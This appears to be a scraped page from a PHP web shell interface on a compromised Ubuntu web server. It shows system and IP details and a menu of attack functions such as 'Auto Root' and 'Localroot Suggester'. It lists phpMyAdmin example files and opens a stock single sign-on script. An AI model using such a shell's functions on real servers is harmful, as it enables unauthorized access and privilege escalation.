Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 18.217.140.32
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
phpmyadmin /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
config.manyhosts.inc.php
2.02
KB
-rw-r--r--
2021-06-04 04:20
config.sample.inc.php
4.37
KB
-rw-r--r--
2021-06-04 04:20
create_tables.sql
10.69
KB
-rw-r--r--
2021-06-04 04:20
openid.php
4.44
KB
-rw-r--r--
2021-06-04 04:20
signon-script.php
796
B
-rw-r--r--
2021-06-04 04:20
signon.php
2.5
KB
-rw-r--r--
2021-06-04 04:20
Save
Rename
<?php /** * Single signon for phpMyAdmin * * This is just example how to use script based single signon with * phpMyAdmin, it is not intended to be perfect code and look, only * shows how you can integrate this functionality in your application. */ declare(strict_types=1); // phpcs:disable Squiz.Functions.GlobalFunction /** * This function returns username and password. * * It can optionally use configured username as parameter. * * @param string $user User name * * @return array */ function get_login_credentials($user) { /* Optionally we can use passed username */ if (! empty($user)) { return [ $user, 'password', ]; } /* Here we would retrieve the credentials */ return [ 'root', '', ]; }